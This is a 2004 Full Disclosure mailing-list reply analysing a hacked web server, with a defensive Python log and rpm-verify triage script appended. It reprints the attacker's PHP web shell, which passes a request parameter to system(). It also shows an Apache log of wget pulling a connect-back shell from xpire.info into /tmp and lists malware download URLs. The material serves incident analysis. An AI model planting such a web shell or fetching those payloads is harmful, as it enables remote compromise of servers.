Full Disclosure mailing list archives
Re: xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Sun, 24 Oct 2004 21:06:51 +0200
I'm not sure that qmail-inject isn't a red herring? The actual download looks like 'wget' was used.
Good suggestion, my friend :) WGET was used to retrieve the http://xpire.info/cli.gz connect-back shell. After further analysis I found that another person had the same problem: http://groups.google.it/groups?hl=it&lr=&selm=2wrKc-2TW-49%40gated-at.bofh.it

Here is the log trapped by Apache:

--------------------------------------------------------------------------------
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
ls: /usr/include/sdk386: No such file or directory
ls: /usr/bin/X11/X: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

    0K .......... ........                                   100%   20.04 KB/s

18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
------------------------------------------------------------------------

If you compare the output, it's possible to see that in the log I showed first the stdout was in Italian (because the compromised server is .it); in this case it is in English. The hacker launched the WGET command to retrieve his hacking tool into /tmp/a.out. In this log you can also see that the hacker tried to execute some "ls" commands, as a first trial to test the vulnerability, I suppose. Moved by this, after further analysis I found that the vulnerability used is an obvious-but-effective PHP injection using global variables (http://www.securityfocus.com/archive/1/218000 is a good page to learn something about this vuln).
The hacker pages used to accomplish the injection are based on this test page, taken directly from the hacker site :-)

http://xpire.info/s/2
http://xpire.info/s/

I notice that this site is full of trojans/backdoors/shells/worms/exploits and other malware....why is it still open?

http://xpire.info/cli.gz      // connect-back shell
http://xpire.info/fa/aga.exe  // agobot family
http://xpire.info/install.gz  // some trojan/malware ???? my NortonAV does not catch it; it's a Windows EXE

This is the sample PHP injection page:

<?
// $lox and $REQUEST_URI below are filled straight from the HTTP request
// via register_globals; nothing is validated before reaching system()
$OS = system('uname -a');
$X = system('ls -la /usr/bin/X11/X');
echo "<OS>".$OS."</OS><br>";
echo "<X>".$X."</X>";
?>
<form action="<?=$REQUEST_URI;?>" method=POST>
<input type=text name=lox value='<?=$lox;?>' size=40><br>
<input type=submit>
</form>
<pre>
<xmp>
<?=system($lox);?>
</xmp>
</pre>

Using the PHP "system" call, it is possible to execute any remote command, like WGET for example. Did anyone know about this page before???
I assume you used a bootable CD on the infected machine to do the checksums?

Unfortunately (I know that this is a *must* for a good analysis) I'm doing the check remotely, using SSH, so I cannot use a bootable CD on this remote host, which is very far from me :) I'm limited in the analysis.....but the host is not mine! However, I think that md5sum gives me good results, because I compared all of the /usr/sbin directory and all the checksums were good, except for /usr/sbin/crond......any ideas??? I also used the "rpm -Vf" utility to cross-check the results, and they were the same as md5sum's.
Check the httpd.conf (and other Apache configuration files) for any changes, and also the contents of each module loaded. It's also possible, but less likely, that the injection is done in a kernel module.
It's my fear :(((((((((( I studied all the *.conf files related to the Apache/PHP modules of this machine, but nothing was found. An injected LKM could be the only answer. I also ran "chkrootkit", as someone suggested to me, but all the tests gave a positive answer (no worm, no rootkit, no trojan).
Sounds like a good time to replace the entire server with a fresh build.
Actually, my work will finish when this activity begins :)))))) Thank you for the help, Kevin.

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
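As an added example (not part of the original post, and not code from the hacker site), here is a small Python triage script for the two checks discussed in this message: pulling the command-injection indicators out of Apache error_log text of the shape pasted above (the stderr of a failed `sh -c` and of `ls` probes, and the wget transfer output showing a payload fetched into /tmp), and interpreting `rpm -V` output, the cross-check the author ran against md5sum. The error_log lines and the rpm output embedded in the script are constructed samples in the real formats, not the author's data; the regexes for the wget 1.8/1.9-era output are assumptions about that format. One caveat the thread itself raises: both checks run on the live host, so a kernel-level rootkit can lie to them. They narrow down what to look at; they do not replace verification from a clean boot medium.

```python
# Added triage example for the thread above, not code from the original post.  The Apache
# error_log and `rpm -V` samples are constructed in the real formats, not the author's data.
import re
from dataclasses import dataclass, field
from typing import Optional

# stdout/stderr of commands spawned by the web server lands between the Apache entries
SAMPLE_ERROR_LOG = """\
[Mon Aug 23 06:25:18 2004] [notice] Accept mutex: sysvsem (Default: sysvsem)
ls: /usr/bin/X11/X: No such file or directory
sh: option `-c' requires an argument
ls: /usr/include/sdk386: No such file or directory
--18:06:28--  http://xpire.info/cli.gz
           => `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[202.99.23.162]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]
    0K .......... ........                                   100%   20.04 KB/s
18:06:29 (20.04 KB/s) - `/tmp/a.out' saved [19147/19147]
"""
SAMPLE_RPM_VERIFY = """\
S.5....T.    /usr/sbin/crond
.......T.  c /etc/crontab
missing      /usr/share/doc/vixie-cron/README
"""

APACHE_ENTRY = re.compile(r"^\[\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}\] \[\w+\]")
WGET_URL = re.compile(r"^--\d\d:\d\d:\d\d--\s+(\S+)")
WGET_DEST = re.compile(r"=> `([^']+)'")
WGET_CONNECT = re.compile(r"^Connecting to (\S+?)\[([\d.]+)\]:(\d+)")
WGET_SAVED = re.compile(r"`([^']+)' saved \[(\d+)/(\d+)\]")
WGET_NOISE = re.compile(r"^(?:Resolving |HTTP request sent|Length: |\s*\d+K )")
# stderr of sh/ls/... run through PHP system(): the tell-tale of blind injection probes
SHELL_ERROR = re.compile(r"^\w+: .*(?:requires an argument|No such file or directory|not found)")
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")  # world-writable drop locations

@dataclass
class Download:
    url: str
    dest: Optional[str] = None
    remote_ip: Optional[str] = None
    remote_port: Optional[int] = None
    size: Optional[int] = None
    complete: bool = False

    def in_staging_dir(self) -> bool:
        return self.dest is not None and self.dest.startswith(STAGING_DIRS)

@dataclass
class Triage:
    downloads: list = field(default_factory=list)
    shell_errors: list = field(default_factory=list)
    other_foreign_lines: list = field(default_factory=list)  # non-Apache, unexplained

def triage_error_log(text: str) -> Triage:
    """Pull wget transfers and shell error output out of Apache error_log text."""
    result, current = Triage(), None  # current: the wget transfer being parsed
    for line in text.splitlines():
        if not line.strip() or APACHE_ENTRY.match(line):
            continue
        if m := WGET_URL.match(line):
            current = Download(url=m.group(1))
            result.downloads.append(current)
            if d := WGET_DEST.search(line):  # newer wget prints "=> `file'" on this line
                current.dest = d.group(1)
        elif current and (m := WGET_DEST.search(line)):
            current.dest = m.group(1)
        elif current and (m := WGET_CONNECT.match(line)):
            current.remote_ip, current.remote_port = m.group(2), int(m.group(3))
        elif current and (m := WGET_SAVED.search(line)):
            current.dest, current.size = current.dest or m.group(1), int(m.group(2))
            current.complete = m.group(2) == m.group(3)
            current = None
        elif WGET_NOISE.match(line):
            continue
        elif SHELL_ERROR.match(line):
            result.shell_errors.append(line)
        else:
            result.other_foreign_lines.append(line)
    return result

# rpm -V flag letters -> attribute that differs from the package database
RPM_FLAGS = {"S": "size", "M": "mode", "5": "digest", "D": "device", "L": "symlink",
             "U": "user", "G": "group", "T": "mtime", "P": "capabilities"}
RPM_LINE = re.compile(r"^(missing|[SM5DLUGTP.?]{8,9})\s+(?:([cdglr])\s+)?(/\S+)\s*$")

def parse_rpm_verify(text: str) -> list:
    """One dict per reported file: path, changed attributes, missing flag, marker ('c' = config)."""
    entries = []
    for m in filter(None, map(RPM_LINE.match, text.splitlines())):
        flags, attr, path = m.groups()
        changed = frozenset(RPM_FLAGS[c] for c in flags if c in RPM_FLAGS)
        entries.append({"path": path, "changed": changed, "missing": flags == "missing", "attr": attr})
    return entries

def suspicious_binaries(entries) -> list:
    """Non-config files whose content (digest or size) no longer matches the package."""
    return [e["path"] for e in entries
            if not e["missing"] and e["attr"] != "c" and e["changed"] & {"digest", "size"}]
```

Run against the sample, `triage_error_log` yields one download (http://xpire.info/cli.gz saved as /tmp/a.out from 202.99.23.162:80, 19147 bytes, complete) and three shell error lines, with nothing left unexplained; `suspicious_binaries` reports only /usr/sbin/crond, since a config file whose mtime changed is normal and a missing doc file says nothing about integrity. On a real host, feed it the actual error_log and the output of `rpm -Va` (or `rpm -Vf` on the directories of interest), and treat any hit as a reason to image the box, not as proof of a clean one.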
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)